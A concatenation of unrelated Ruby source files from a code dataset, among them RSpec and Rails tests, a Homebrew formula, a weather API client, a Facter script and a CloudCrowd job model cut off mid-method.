    ret_val = lambda do |hash,attr,s|
      ret = ""
      ndx = hash[s]
      unless function_hdp_is_empty(ndx)
        val = ndx[attr]
        ret = function_hdp_is_empty(val) ? "" : val
      end
      ret
    end
    if source.kind_of?(Array)
      source.map{|s|ret_val.call(hash,attr,s)}
    else
      ret_val.call(hash,attr,source)
    end
  end
end
| 32.146341 | 62 | 0.707891 |
ac44aff963c82c98fe4784102d9bc35399cd1c86 | 512 | require 'object_protocol/satisfiable_message_sequence_expectation_base'
class ObjectProtocol
  # Ordered variant of a message-sequence expectation: a sent message is
  # only ever offered to the first still-unsatisfied sub-expectation, so
  # the expectations must be satisfied in declaration order.
  class SatisfiableOrderedMessageSequenceExpectation < SatisfiableMessageSequenceExpectationBase
    def attempt_to_apply_sent_message(sent_message)
      return if satisfied?
      next_unsatisfied_expectation = satisfiable_expectations.find(&:unsatisfied?)
      next_unsatisfied_expectation.attempt_to_apply_sent_message(sent_message)
    end

    private

    # Label used when rendering this expectation.
    def inspect_name
      "in_order"
    end
  end
end
| 25.6 | 96 | 0.810547 |
1c9095beca3eadf5b42170c4d6baafc89dd55435 | 5,477 | # module Importers::Mhc
# class ConversionEmployerUpdate < ConversionEmployer
#
# def initialize(opts = {})
# super(opts)
# end
#
# # covered scenarios
# # if broker is hired/terminated, then updated_at column in employer_profile model is changed.
# # if office locations is updated, then updated_at column in organization model is changed.
# # if employer info is updated, then updated_at column in employer_profile model is changed.
# # if broker_agency_profile info is updated, then updated_at column in broker_agency_profile model is changed.
#
# def has_data_not_changed_since_import
# has_organization_info_changed?
# has_employer_info_changed?
# has_office_locations_changed?
# has_broker_agency_profile_info_changed?
# end
#
# def find_organization
# return nil if fein.blank?
# Organization.where(:fein => fein).first
# end
#
# def employer_profile
# find_organization.try(:employer_profile)
# end
#
# def broker_agency_profile
# employer_profile.try(:broker_agency_profile)
# end
#
# def has_organization_info_changed?
# organization = find_organization
# if organization.present? && organization.updated_at > organization.created_at
# errors.add(:organization, "import cannot be done as organization info was updated on #{organization.updated_at}")
# end
# end
#
# def has_employer_info_changed?
# if employer_profile.present? && employer_profile.updated_at > employer_profile.created_at
# errors.add(:employer_profile, "import cannot be done as employer updated the info on #{employer_profile.updated_at}")
# end
# end
#
# def has_broker_agency_profile_info_changed?
# if broker_agency_profile.present? && broker_agency_profile.updated_at > broker_agency_profile.created_at
# errors.add(:broker_agency_profile, "import cannot be done as broker agency profile was updated on #{employer_profile.updated_at}")
# end
# end
#
# def has_office_locations_changed?
# organization = find_organization
# if organization.present?
# organization.office_locations.each do |office_location|
# address = office_location.try(:address)
# if address.present? && address.updated_at.present? && address.created_at.present? && address.updated_at > address.created_at
# errors.add(:organization, "import cannot be done as office location was updated on #{address.updated_at}.")
# end
# end
# end
# end
#
# def save
# organization = find_organization
# begin
# if organization.blank?
# errors.add(:fein, "employer don't exists with given fein")
# end
# has_data_not_changed_since_import
#
# if errors.empty?
# puts "Processing Update #{fein}---Data Sheet# #{legal_name}---Enroll App# #{organization.legal_name}" unless Rails.env.test?
# organization.legal_name = legal_name
# organization.dba = dba
# organization.office_locations = map_office_locations
#
# if broker_npn.present?
# broker_exists_if_specified
# br = BrokerRole.by_npn(broker_npn).first
# if br.present? && organization.employer_profile.broker_agency_accounts.where(:writing_agent_id => br.id).blank?
# organization.employer_profile.broker_agency_accounts = assign_brokers
# end
# end
#
# broker = find_broker
# general_agency = find_ga
#
# if broker.present? && general_agency.present?
#
# general_agency_account = organization.employer_profile.general_agency_accounts.where({
# :general_agency_profile_id => general_agency.id,
# :broker_role_id => broker.id
# }).first
#
# if general_agency_account.present?
#
# organization.employer_profile.general_agency_accounts.each do |account|
# if (account.id != general_agency_account.id && account.active?)
# account.terminate! if account.may_terminate?
# end
# end
#
# general_agency_account.update_attributes(:aasm_state => 'active') if general_agency_account.inactive?
# else
# if new_account = assign_general_agencies.first
# organization.employer_profile.general_agency_accounts.each{|ac| ac.terminate! if ac.may_terminate? }
# organization.employer_profile.general_agency_accounts << new_account
# end
# end
# end
# update_result = organization.save
# else
# update_result = false # if there are errors, then return false.
# end
#
# rescue Mongoid::Errors::UnknownAttribute
# organization.employer_profile.plan_years.each do |py|
# py.benefit_groups.each{|bg| bg.unset(:_type) }
# end
# update_result = errors.empty? && organization.save
# rescue Exception => e
# puts "FAILED.....#{e.to_s}"
# end
#
# begin
# if update_result
# update_poc(organization.employer_profile)
# end
# rescue Exception => e
# puts "FAILED.....#{e.to_s}"
# end
#
# if organization
# propagate_errors(organization)
# end
#
# return update_result
# end
# end
# end
| 38.300699 | 140 | 0.646157 |
e8c6ec4ceb58ca90f03f1a0211b205dfb2085941 | 1,670 | # frozen_string_literal: true
# Specs for GemComet::VersionHistory. `git_tag_list` is stubbed with a fixed
# "tag date" listing so no real git repository is required.
RSpec.describe GemComet::VersionHistory do
  let(:instance) { described_class.new }
  let(:git_tag_result) do
    <<~RESULT
      v0.1.0 2019-07-15
      v0.1.1 2019-10-13
      v0.2.0 2019-10-14
      v0.3.0 2019-10-19
    RESULT
  end

  before do
    allow(instance).to receive(:git_tag_list).and_return(git_tag_result)
  end

  describe '#versions' do
    # The tag names are returned in order with "HEAD" appended.
    it 'returns an array of version numbers' do
      expect(instance.versions).to eq %w[v0.1.0 v0.1.1 v0.2.0 v0.3.0 HEAD]
    end
  end

  describe '#previous_version_from' do
    subject(:previous_version) { instance.previous_version_from(version) }

    context 'with the first version number' do
      let(:version) { 'v0.1.0' }

      it { is_expected.to be_nil }
    end

    context 'with "v0.2.0", which is the next version of "v0.1.1"' do
      let(:version) { 'v0.2.0' }

      it { is_expected.to eq 'v0.1.1' }
    end

    context 'with a wrong version number' do
      let(:version) { 'xxx' }

      it { expect { previous_version }.to raise_error 'The specified version cannot be found' }
    end
  end

  describe '#versioning_date_of' do
    subject(:versioning_date) { instance.versioning_date_of(version) }

    # "HEAD" resolves to the current date rather than a tag date.
    context 'with "HEAD"' do
      let(:version) { 'HEAD' }

      it { is_expected.to eq Date.today }
    end

    context 'with "v0.2.0", which added at 2019-10-14' do
      let(:version) { 'v0.2.0' }

      it { is_expected.to eq Date.new(2019, 10, 14) }
    end

    context 'with a wrong version number' do
      let(:version) { 'xxx' }

      it { expect { versioning_date }.to raise_error 'The specified version cannot be found' }
    end
  end
end
| 24.202899 | 95 | 0.635928 |
7a47dde5984ca5510e84f4f03513170bbdd2d607 | 1,514 | require 'test_helper'
# Tests the join model linking regional partners to program-manager users:
# workshop scoping and the derived `program_manager?` permission.
class Pd::RegionalPartnerProgramManagerTest < ActiveSupport::TestCase
  test 'pd_workshops association' do
    partner_organizer = create :workshop_organizer
    regional_partner_program_manager = create :regional_partner_program_manager, program_manager: partner_organizer
    non_partner_organizer = create :workshop_organizer

    partner_workshop = create :workshop, organizer: partner_organizer
    non_partner_workshop = create :workshop, organizer: non_partner_organizer

    # Only workshops organized by the linked program manager are exposed.
    assert regional_partner_program_manager.pd_workshops_organized.include? partner_workshop
    refute regional_partner_program_manager.pd_workshops_organized.include? non_partner_workshop
  end

  test 'program manager permission with single partner' do
    program_manager = create :teacher
    refute program_manager.program_manager?

    # The permission is granted by the join record and revoked with it.
    regional_partner_program_manager = create :regional_partner_program_manager, program_manager: program_manager
    assert program_manager.program_manager?

    regional_partner_program_manager.destroy
    refute program_manager.program_manager?
  end

  test 'program manager permission with multiple partners' do
    program_manager = create :teacher
    refute program_manager.program_manager?

    regional_partner_program_managers = create_list :regional_partner_program_manager, 2, program_manager: program_manager
    assert program_manager.program_manager?

    # Destroying one of two links must keep the permission intact.
    regional_partner_program_managers.first.destroy
    assert program_manager.program_manager?
  end
end
| 40.918919 | 122 | 0.830911 |
1a2f44bad2caf6f21741f7c2e635c36d05dcee02 | 470 | require 'formula'
# Homebrew formula for libechonest, a Qt wrapper around the Echo Nest API.
class Libechonest < Formula
  homepage 'https://projects.kde.org/projects/playground/libs/libechonest'
  url 'http://files.lfranchi.com/libechonest-2.2.0.tar.bz2'
  sha1 'fec281d9288c2a4fabd2dd275f1a508dd6d1bc5c'

  depends_on 'cmake' => :build
  depends_on 'qt'
  depends_on 'qjson'

  conflicts_with 'doxygen', :because => "cmake fails to configure build."

  # Standard out-of-the-box CMake build and install.
  def install
    system "cmake", ".", *std_cmake_args
    system "make install"
  end
end
| 24.736842 | 74 | 0.729787 |
03f9f3fa56e8b83c77ec239a91ad97905ca65f76 | 15,008 | #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# Copyright (c) 2016, Electric Power Research Institute (EPRI)
# All rights reserved.
#
# OpenADR ("this software") is licensed under BSD 3-Clause license.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of EPRI nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
#
# This EPRI software incorporates work covered by the following copyright and permission
# notices. You may not use these works except in compliance with their respective
# licenses, which are provided below.
#
# These works are provided by the copyright holders and contributors "as is" and any express or
# implied warranties, including, but not limited to, the implied warranties of merchantability
# and fitness for a particular purpose are disclaimed.
#
#########################################################################################
# MIT Licensed Libraries
#########################################################################################
#
# * actionmailer 3.2.12 (http://www.rubyonrails.org) - Email composition, delivery, and receiving framework (part of Rails).
# * actionpack 3.2.12 (http://www.rubyonrails.org) - Web-flow and rendering framework putting the VC in MVC (part of Rails).
# * activemodel 3.2.12 (http://www.rubyonrails.org) - A toolkit for building modeling frameworks (part of Rails).
# * activerecord 3.2.12 (http://www.rubyonrails.org) - Object-relational mapper framework (part of Rails).
# * activeresource 3.2.12 (http://www.rubyonrails.org) - REST modeling framework (part of Rails).
# * activesupport 3.2.12 (http://www.rubyonrails.org) - A toolkit of support libraries and Ruby core extensions extracted from the Rails framework.
# * arel 3.0.2 (http://github.com/rails/arel) - Arel is a SQL AST manager for Ruby
# * bootstrap-sass 3.1.1.0 (https://github.com/twbs/bootstrap-sass) - Twitter's Bootstrap, converted to Sass and ready to drop into Rails or Compass
# * builder 3.0.4 (http://onestepback.org) - Builders for MarkUp.
# * bundler 1.12.5 (http://bundler.io) - The best way to manage your application's dependencies
# * capybara 2.4.4 (http://github.com/jnicklas/capybara) - Capybara aims to simplify the process of integration testing Rack applications, such as Rails, Sinatra or Merb
# * coffee-rails 3.2.2 () - Coffee Script adapter for the Rails asset pipeline.
# * coffee-script-source 1.6.3 (http://jashkenas.github.com/coffee-script/) - The CoffeeScript Compiler
# * docile 1.1.5 (https://ms-ati.github.io/docile/) - Docile keeps your Ruby DSLs tame and well-behaved
# * edn 1.0.0 () - 'edn implements a reader for Extensible Data Notation by Rich Hickey.'
# * erubis 2.7.0 (http://www.kuwata-lab.com/erubis/) - a fast and extensible eRuby implementation which supports multi-language
# * execjs 1.4.0 (https://github.com/sstephenson/execjs) - Run JavaScript code from Ruby
# * factory_girl 4.5.0 (https://github.com/thoughtbot/factory_girl) - factory_girl provides a framework and DSL for defining and using model instance factories.
# * factory_girl_rails 4.5.0 (http://github.com/thoughtbot/factory_girl_rails) - factory_girl_rails provides integration between factory_girl and rails 3
# * gem-licenses 0.1.2 (http://github.com/dblock/gem-licenses) - List all gem licenses.
# * hike 1.2.3 (http://github.com/sstephenson/hike) - Find files in a set of paths
# * i18n 0.6.5 (http://github.com/svenfuchs/i18n) - New wave Internationalization support for Ruby
# * jdbc-postgresql 9.2.1000 (https://github.com/rosenfeld/jdbc-postgresql) - PostgresSQL jdbc driver for JRuby
# * journey 1.0.4 (http://github.com/rails/journey) - Journey is a router
# * jquery-rails 3.0.4 (http://rubygems.org/gems/jquery-rails) - Use jQuery with Rails 3
# * json-schema 2.6.2 (http://github.com/ruby-json-schema/json-schema/tree/master) - Ruby JSON Schema Validator
# * mail 2.4.4 (http://github.com/mikel/mail) - Mail provides a nice Ruby DSL for making, sending and reading emails.
# * metaclass 0.0.4 (http://github.com/floehopper/metaclass) - Adds a metaclass method to all Ruby objects
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
# * mocha 1.1.0 (http://gofreerange.com/mocha/docs) - Mocking and stubbing library
# * multi_json 1.7.9 (http://github.com/intridea/multi_json) - A common interface to multiple JSON libraries.
# * nokogiri 1.6.5 (http://nokogiri.org) - Nokogiri (鋸) is an HTML, XML, SAX, and Reader parser
# * polyglot 0.3.3 (http://github.com/cjheath/polyglot) - Augment 'require' to load non-Ruby file types
# * rack-test 0.6.2 (http://github.com/brynary/rack-test) - Simple testing API built on Rack
# * railties 3.2.12 (http://www.rubyonrails.org) - Tools for creating, working with, and running Rails applications.
# * rake 10.1.0 (http://rake.rubyforge.org) - Ruby based make-like utility.
# * rspec-core 2.14.3 (http://github.com/rspec/rspec-core) - rspec-core-2.14.3
# * rspec-expectations 2.14.0 (http://github.com/rspec/rspec-expectations) - rspec-expectations-2.14.0
# * rspec-mocks 2.14.1 (http://github.com/rspec/rspec-mocks) - rspec-mocks-2.14.1
# * rspec-rails 2.14.0 (http://github.com/rspec/rspec-rails) - rspec-rails-2.14.0
# * sass 3.2.9 (http://sass-lang.com/) - A powerful but elegant CSS compiler that makes CSS fun again.
# * sass-rails 3.2.6 () - Sass adapter for the Rails asset pipeline.
# * simplecov 0.9.0 (http://github.com/colszowka/simplecov) - Code coverage for Ruby 1.9+ with a powerful configuration library and automatic merging of coverage across test suites
# * spork 1.0.0rc3 (http://github.com/sporkrb/spork) - spork
# * therubyrhino 2.0.2 (http://github.com/cowboyd/therubyrhino) - Embed the Rhino JavaScript interpreter into JRuby
# * thor 0.18.1 (http://whatisthor.com/) - A scripting framework that replaces rake, sake and rubigen
# * tilt 1.4.1 (http://github.com/rtomayko/tilt/) - Generic interface to multiple Ruby template engines
# * treetop 1.4.14 (https://github.com/cjheath/treetop) - A Ruby-based text parsing and interpretation DSL
# * uglifier 2.1.2 (http://github.com/lautis/uglifier) - Ruby wrapper for UglifyJS JavaScript compressor
# * xpath 2.0.0 (http://github.com/jnicklas/xpath) - Generate XPath expressions from Ruby
# * blankslate 2.1.2.4 (http://github.com/masover/blankslate) - BlankSlate extracted from Builder.
# * bourbon 3.1.8 (https://github.com/thoughtbot/bourbon) - Bourbon Sass Mixins using SCSS syntax.
# * coffee-script 2.2.0 (http://github.com/josh/ruby-coffee-script) - Ruby CoffeeScript Compiler
# * diff-lcs 1.2.4 (http://diff-lcs.rubyforge.org/) - Diff::LCS computes the difference between two Enumerable sequences using the McIlroy-Hunt longest common subsequence (LCS) algorithm
# * jquery-ui-rails 4.0.3 (https://github.com/joliss/jquery-ui-rails) - jQuery UI packaged for the Rails asset pipeline
# * parslet 1.4.0 (http://kschiess.github.com/parslet) - Parser construction library with great error reporting in Ruby.
# * rack 1.4.5 (http://rack.github.com/) - a modular Ruby webserver interface
# * rack-cache 1.2 (http://tomayko.com/src/rack-cache/) - HTTP Caching for Rack
# * rack-ssl 1.3.3 (https://github.com/josh/rack-ssl) - Force SSL/TLS in your app.
# * rails 3.2.12 (http://www.rubyonrails.org) - Full-stack web application framework.
# * simplecov-html 0.8.0 (https://github.com/colszowka/simplecov-html) - Default HTML formatter for SimpleCov code coverage tool for ruby 1.9+
# * tzinfo 0.3.37 (http://tzinfo.rubyforge.org/) - Daylight-savings aware timezone library
# * warbler 1.4.0.beta1 (http://caldersphere.rubyforge.org/warbler) - Warbler chirpily constructs .war files of your Rails applications.
#
#########################################################################################
# BSD Licensed Libraries
#########################################################################################
#
# * activerecord-jdbc-adapter 1.2.9.1 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 2006-2012 Nick Sieger <[email protected]>, Copyright (c) 2006-2008 Ola Bini <[email protected]>
# * jdbc-postgres 9.2.1004 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 1997-2011, PostgreSQL Global Development Group
# * d3js 3.5.16 (https://d3js.org/) Copyright (c) 2015 Mike Bostock
#
#########################################################################################
# Ruby Licensed Libraries
#########################################################################################
#
# * json 1.8.0 (http://json-jruby.rubyforge.org/) - JSON implementation for JRuby
# * rubyzip 0.9.9 (http://github.com/aussiegeek/rubyzip) - rubyzip is a ruby module for reading and writing zip files
# * httpclient 2.3.4.1 (http://github.com/nahi/httpclient) - gives something like the functionality of libwww-perl (LWP) in Ruby
# * test-unit 2.5.5 (http://test-unit.rubyforge.org/) - test-unit - Improved version of Test::Unit bundled in Ruby 1.8.x.
#
#########################################################################################
# Public domain - creative commons Licensed Libraries
#########################################################################################
#
# * torquebox 3.1.2 (http://torquebox.org/) - TorqueBox Gem
# * torquebox-cache 3.1.2 (http://torquebox.org/) - TorqueBox Cache Gem
# * torquebox-configure 3.1.2 (http://torquebox.org/) - TorqueBox Configure Gem
# * torquebox-core 3.1.2 (http://torquebox.org/) - TorqueBox Core Gem
# * torquebox-messaging 3.1.2 (http://torquebox.org/) - TorqueBox Messaging Client
# * torquebox-naming 3.1.2 (http://torquebox.org/) - TorqueBox Naming Client
# * torquebox-rake-support 3.1.2 (http://torquebox.org/) - TorqueBox Rake Support
# * torquebox-security 3.1.2 (http://torquebox.org/) - TorqueBox Security Gem
# * torquebox-server 3.1.2 (http://torquebox.org/) - TorqueBox Server Gem
# * torquebox-stomp 3.1.2 (http://torquebox.org/) - TorqueBox STOMP Support
# * torquebox-transactions 3.1.2 (http://torquebox.org/) - TorqueBox Transactions Gem
# * torquebox-web 3.1.2 (http://torquebox.org/) - TorqueBox Web Gem
#
#########################################################################################
# Apache Licensed Libraries
#########################################################################################
#
# * addressable 2.3.8 (https://github.com/sporkmonger/addressable) - URI Implementation
# * bcrypt-ruby 3.0.1 (http://bcrypt-ruby.rubyforge.org) - OpenBSD's bcrypt() password hashing algorithm.
# * database_cleaner 1.4.0 (http://github.com/bmabey/database_cleaner) - Strategies for cleaning databases. Can be used to ensure a clean state for testing.
# * annotate 2.5.0 (http://github.com/ctran/annotate_models) - Annotates Rails Models, routes, fixtures, and others based on the database schema.
# * nvd3 1.8.4 (http://nvd3.org/) Copyright (c) 2014 Novus Partners - chart library based on d3js
# * smack 3.3.1 (https://www.igniterealtime.org/projects/smack/) - XMPP library
#
#########################################################################################
# LGPL
#########################################################################################
#
# * jruby-1.7.4
# * jruby-jars 1.7.4 (http://github.com/jruby/jruby/tree/master/gem/jruby-jars) - The core JRuby code and the JRuby stdlib as jar
# ** JRuby is tri-licensed GPL, LGPL, and EPL.
#
#########################################################################################
# MPL Licensed Libraries
#########################################################################################
#
# * therubyrhino_jar 1.7.4 (http://github.com/cowboyd/therubyrhino) - Rhino's jars packed for therubyrhino
#
#########################################################################################
# Artistic 2.0
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
#
#########################################################################################
# GPL-2
#########################################################################################
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
# No License Given
#########################################################################################
#
# * spork-testunit 0.0.8 (http://github.com/timcharper/spork-testunit) - spork-testunit
# * sprockets 2.2.2 (http://getsprockets.org/) - Rack-based asset packaging system
#
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# == Schema Information
#
# Table name: resource_types
#
# id :integer not null, primary key
# name :string(255)
# description :string(255)
# created_at :datetime not null
# updated_at :datetime not null
#
require 'test_helper'
class ResourceTypeTest < ActiveSupport::TestCase
  # test "the truth" do
  #   assert true
  # end

  setup do
    @resource_type = resource_types(:one)
  end

  ######################################################################

  test "resource type name should be unique" do
    # Saving a duplicate-named record should fail validation and leave an
    # error on :name. NOTE(review): assumes a uniqueness validation exists on
    # ResourceType#name — confirm in the model.
    resource_type2 = ResourceType.new(name: @resource_type.name)
    resource_type2.save
    assert_not_nil resource_type2.errors.messages[:name], "allowed duplicate name"
  end
end
| 68.218182 | 206 | 0.634928 |
ed59dd63cbc4c6effe33d3b1b25aa357fc7bb591 | 1,654 | # frozen_string_literal: true
require 'rails_helper'
# Controller specs for GroupsController: all actions require authentication,
# and creation redirects back to the form on invalid input.
RSpec.describe GroupsController, type: :controller do
  describe 'GET' do
    it 'redirects if not authenticated' do
      get :index
      expect(response).to have_http_status(:redirect)
    end

    it 'gets to index of groups if authenticated' do
      sign_in create(:user)
      get :index
      expect(response).to have_http_status(:success)
    end

    it 'renders the index template' do
      sign_in create(:user)
      get :index
      expect(response).to render_template('index')
    end
  end

  describe 'GET new' do
    it 'redirects to login if not authenticated' do
      get :new
      expect(response).to have_http_status(:redirect)
    end

    it 'gets to new group form authenticated' do
      sign_in create(:user)
      get :new
      expect(response).to have_http_status(:success)
    end

    # NOTE(review): the example name says "index" but the assertion checks the
    # `new` template — the name looks copy-pasted; consider renaming.
    it 'renders the index template' do
      sign_in create(:user)
      get :new
      expect(response).to render_template('new')
    end
  end

  describe 'POST to /groups' do
    it 'redirects to login if not authenticated' do
      post :create
      expect(response).to have_http_status(:redirect)
    end

    # NOTE(review): despite the name, the controller redirects to /groups/new
    # on invalid data rather than re-rendering `new` in place.
    it 'renders new in presence of invalid/incomplete data' do
      sign_in create(:user)
      post :create, params: { group: {} }
      expect(response).to redirect_to('/groups/new')
    end

    it 'renders index after saving valid task' do
      sign_in create(:user)
      post :create, params: { group: {
        name: 'Sample Group'
      } }
      expect(response).to have_http_status(:redirect)
      expect(response).to redirect_to('/groups')
    end
  end
end
| 25.060606 | 62 | 0.655381 |
1da764f40bbde4d481c8aedc30d8cd5be11969eb | 313 | class Order < ApplicationRecord
has_many :order_items
before_save :set_subtotal
def subtotal
order_items.collect{|order_item| order_item.valid? ? order_item.unit_price*order_item.quantity : 0}.sum
end
private
def set_subtotal
self[:subtotal] = subtotal
end
end
| 15.65 | 111 | 0.690096 |
91dd6589dd87e4ee2df9a70ab5bde4aa451d1372 | 780 | module Barometer
module Query
module Service
class WeatherId
class Api < Utils::Api
def url
'http://wxdata.weather.com/wxdata/search/search'
end
def params
{ where: format_query }
end
def unwrap_nodes
['search']
end
private
# filter out words that weather.com has trouble geo-locating
# mostly these are icao related
#
def format_query
output = query.q.dup
words_to_remove = %w(international airport municipal)
words_to_remove.each do |word|
output.gsub!(/#{word}/i, "")
end
output
end
end
end
end
end
end
| 21.666667 | 70 | 0.502564 |
384ab902b786979d33d2d488099d22e1f9873e2e | 181 | FactoryGirl.define do
factory :ecm_cms_page_content_block, class: Ecm::Cms::Page::ContentBlock do
body 'Content block body'
ecm_cms_content_box
ecm_cms_page
end
end
| 22.625 | 77 | 0.762431 |
6a5e3f1d0298bfe45911f4adfea7ef7c880643c0 | 110 | class AddIndexOnOnestopIds < ActiveRecord::Migration
def change
add_index :stops, :onestop_id
end
end
| 18.333333 | 52 | 0.772727 |
f7dde5edf5668b7ccc3e4b90cd5521f3634cf614 | 782 | require 'test_helper'
module Moderator
  module Post
    # Verifies the moderation queue pages render for an admin user.
    class QueuesControllerTest < ActionController::TestCase
      context "The moderator post queues controller" do
        setup do
          @admin = FactoryGirl.create(:admin_user)
          # Requests below run as this admin from a fixed IP.
          CurrentUser.user = @admin
          CurrentUser.ip_addr = "127.0.0.1"
          @post = FactoryGirl.create(:post, :is_pending => true)
        end

        context "show action" do
          should "render" do
            get :show, {}, {:user_id => @admin.id}
            assert_response :success
          end
        end

        context "random action" do
          should "render" do
            get :random, {}, {:user_id => @admin.id}
            assert_response :success
          end
        end
      end
    end
  end
end
| 24.4375 | 64 | 0.560102 |
acc8e1dd854c79b8dcbf4f0b1a34cc2ac4804b4a | 1,253 | require_relative '../../../automated_init'
context "Output" do
  context "Debug Level" do
    context "Context" do
      # Debug-level writer with ANSI styling on, so the expected text below
      # contains color/SGR escape sequences.
      output = Output::Levels::Debug.new
      output.writer.enable_styling!

      control_fixture = Controls::Fixture.example(output)

      # Exercise every context outcome: pass, anonymous, skip, and failure.
      control_fixture.instance_exec do
        context "Outer Context" do
          context "Pass" do
            comment "Comment #1"
          end

          context do
            comment "Comment #2"
          end

          context "Skip"

          context

          context "Failure" do
            comment "Comment #3"

            test_session.fail!
          end
        end

        context "Skipped Outer Context"
      end

      # NOTE(review): the expected heredoc's relative indentation is
      # significant when compared against writer output — confirm it matches
      # the writer's nesting indent.
      test do
        assert(output.writer.written?(<<~TEXT))
          \e[32mOuter Context\e[39m
          \e[32mPass\e[39m
          Comment #1
          \e[2;3;32mFinished context "Pass" (Result: pass)\e[39;23;22m
          Comment #2
          \e[33mSkip\e[39m
          \e[32mFailure\e[39m
          Comment #3
          \e[2;3;31mFinished context "Failure" (Result: failure)\e[39;23;22m
          \e[2;3;31mFinished context "Outer Context" (Result: failure)\e[39;23;22m
          \e[33mSkipped Outer Context\e[39m
        TEXT
      end
    end
  end
end
| 22.375 | 80 | 0.551476 |
1a8fdc1d35f789bc91a0f9823de31faa9ca2eab5 | 590 | #!/usr/bin/env ruby
# frozen_string_literal: true

require 'thor'
require "#{ROOT_DIR}/lib/framework/logging/logger.rb"

# Send log output to STDERR so STDOUT carries only command results.
Facter::Log.output(STDERR)

require "#{ROOT_DIR}/lib/facter"
require "#{ROOT_DIR}/lib/framework/cli/cli"

Facter::OptionsValidator.validate(ARGV)
# If the first CLI argument is neither a known Thor task nor a task alias
# (Thor's internal @map), prepend the default task so it is treated as a
# fact query rather than a command name.
ARGV.unshift(Facter::Cli.default_task) unless
  Facter::Cli.all_tasks.key?(ARGV[0]) ||
  Facter::Cli.instance_variable_get(:@map).key?(ARGV[0])

begin
  Facter::Cli.start(ARGV, debug: true)
rescue Thor::UnknownArgumentError => e
  Facter::OptionsValidator.write_error_and_exit("unrecognised option '#{e.unknown.first}'")
end
| 29.5 | 91 | 0.757627 |
9195ae87701031522a6d7bffd1792f85fbb2231e | 1,277 | require 'oregano'
# Benchmarks catalog serialization: parses or generates JSON/PSON repeatedly,
# driven by the SER_DIRECTION and SER_FORMAT environment variables.
class Benchmarker
  # target is accepted for the benchmark-harness interface but unused here;
  # size is the number of iterations to run.
  def initialize(target, size)
    @size = size
    @direction = ENV['SER_DIRECTION'] == 'generate' ? :generate : :parse
    @format = ENV['SER_FORMAT'] == 'pson' ? :pson : :json
    puts "Benchmarker #{@direction} #{@format}"
  end

  def setup
  end

  # Load the fixture catalog (JSON file next to this script) into both its
  # raw string form (@data, for parsing) and hash form (@catalog, for dumping).
  def generate
    path = File.expand_path(File.join(__FILE__, '../catalog.json'))
    puts "Using catalog #{path}"
    @data = File.read(path)
    @catalog = JSON.parse(@data)
  end

  def run(args=nil)
    0.upto(@size) do |i|
      # This parses a catalog from JSON data, which is a combination of parsing
      # the data into a JSON hash, and the parsing the hash into a Catalog. It's
      # interesting to see just how slow that latter process is:
      #
      #   Oregano::Resource::Catalog.convert_from(:json, @data)
      #
      # However, for this benchmark, we're just testing how long JSON vs PSON
      # parsing and generation are, where we default to parsing JSON.
      #
      if @direction == :generate
        if @format == :pson
          PSON.dump(@catalog)
        else
          JSON.dump(@catalog)
        end
      else
        if @format == :pson
          PSON.parse(@data)
        else
          JSON.parse(@data)
        end
      end
    end
  end
end
| 25.54 | 80 | 0.593579 |
0394cd20125d880b8a31b82623902204b74f9596 | 3,984 | # A ProcessingJob is the point of control for
# initiating and checking on CloudCrowd::Jobs.
class ProcessingJob < ActiveRecord::Base
  #include DC::Status

  belongs_to :account
  belongs_to :document

  validates :cloud_crowd_id, :presence=>true
  #validates :action, :presence => true

  # Cached copy of the remote CloudCrowd job hash, when we have fetched it.
  attr_accessor :remote_job

  scope :incomplete, ->{ where :complete => false }

  # Quick lookup to find a ProcessingJob from JSON of a CloudCrowd::Job
  def self.lookup_by_remote(attrs)
    self.find_by_cloud_crowd_id attrs.fetch('id')
  end

  # CloudCrowd endpoint to POST work to.
  def self.endpoint
    "#{DC::CONFIG['cloud_crowd_server']}/jobs"
  end

  # A serializer which outputs the attributes needed
  # to post to CloudCrowd.
  class CloudCrowdSerializer < ActiveModel::Serializer
    attributes :action, :inputs, :options, :callback_url

    def options; object.options; end

    # inputs should always be an array of documents.
    def inputs; [object.document_id]; end

    # CloudCrowd calls back to a different route for access updates than for
    # ordinary import jobs.
    def callback_url
      case object.action
      when "update_access"
        "#{DC.server_root(:ssl => false)}/import/update_access"
      else
        "#{DC.server_root(:ssl => false)}/import/cloud_crowd"
      end
    end
  end

  # Validate and initiate this job with CloudCrowd.
  def queue
    # If a Document is associated with this ProcessingJob, determine
